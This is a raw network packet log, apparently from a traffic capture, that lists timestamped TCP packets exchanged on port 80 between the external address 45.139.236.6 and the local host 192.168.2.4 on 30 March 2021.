Mar 30, 2021 14:22:52.836086035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836102009 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836118937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836134911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836143017 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.836164951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836183071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836199045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836215973 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836232901 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836246967 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.836250067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836271048 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836288929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836306095 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836323023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836327076 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.836339951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.836374998 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.836445093 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.837619066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.837646008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.837789059 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.838888884 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.840389013 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.842981100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843012094 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843027115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843039989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843054056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843071938 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843089104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843105078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843122959 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843142986 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843147993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843167067 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843184948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843200922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843215942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843235970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843245983 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843255043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843272924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843291044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843308926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843318939 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843327045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843346119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843363047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843383074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843393087 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843401909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843419075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843436956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843450069 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843453884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843471050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843487978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843506098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843518019 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843527079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843545914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843563080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843575001 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843579054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843596935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843612909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843630075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843636990 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843647003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843667984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843684912 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843698025 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843704939 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843723059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843739986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843755960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843765020 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843772888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843791008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843811989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843816042 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843830109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843848944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843867064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843879938 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843884945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843904018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843921900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843935966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.843938112 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843960047 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843978882 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.843996048 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844002008 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844012976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844029903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844046116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844062090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844073057 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844078064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844099998 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844118118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844129086 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844132900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844151020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844166994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844182968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844194889 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844199896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844218016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844238043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844249964 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844257116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844274998 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844293118 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844310045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844316959 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844326019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844342947 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844358921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844369888 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844378948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844398022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844413996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844432116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844434977 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844449043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844465971 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844480991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844492912 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844499111 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844518900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844537020 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844552994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844559908 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844569921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844585896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844603062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844619036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844630957 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844635963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844656944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844674110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844690084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844692945 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844707012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844723940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844739914 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844741106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844758987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844774961 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844793081 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844794035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844813108 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844829082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844846010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844849110 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844861984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844878912 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844896078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844911098 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844913960 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844934940 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844953060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844966888 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.844969034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.844988108 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.845005035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.845020056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.845029116 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.845036983 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.845061064 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.845077038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.845102072 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.845154047 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.846182108 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.848052025 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.921688080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921731949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921755075 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921777010 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921803951 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921825886 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921849012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921869993 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921891928 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921915054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921911955 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.921937943 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921964884 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.921994925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922019958 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922020912 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922044992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922072887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922076941 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922099113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922123909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922149897 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922151089 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922178030 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922200918 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922208071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922235012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922250032 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922261000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922286987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922308922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922314882 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922333956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922357082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922369003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922382116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922409058 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922426939 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922435045 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922460079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922482967 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922482967 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922508001 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922528028 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922532082 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922555923 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922579050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922585964 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922605038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922627926 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922638893 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922648907 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922687054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922700882 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922712088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922734976 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922755003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922756910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922780037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922801971 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922806978 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922825098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922847986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922863007 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922872066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922899008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922919035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922923088 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922944069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922966957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.922977924 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.922991991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923017025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923039913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923069000 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923094034 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923104048 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.923115969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923137903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923160076 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923178911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.923183918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923207998 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923232079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923243046 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.923258066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923283100 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923290014 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.923306942 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923330069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923352957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923352003 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.923377037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923401117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923410892 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.923424006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.923459053 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.924125910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.924217939 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.925240040 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930255890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930294037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930316925 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930341005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930366039 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930391073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930413008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930423975 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930438042 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930465937 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930471897 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930493116 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930519104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930524111 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930542946 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930557966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930569887 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930592060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930614948 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930614948 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930640936 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930660963 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930669069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930692911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930699110 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930718899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930742979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930767059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930772066 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930788994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930813074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930830002 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930836916 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930866957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930879116 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930891991 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930916071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930923939 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930941105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930946112 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.930967093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.930989027 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931004047 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931013107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931037903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931051016 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931063890 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931082964 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931092024 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931117058 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931138992 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931152105 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.931164980 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.931190014 CEST	80	49744	45.139.236.6	192.168.2.4
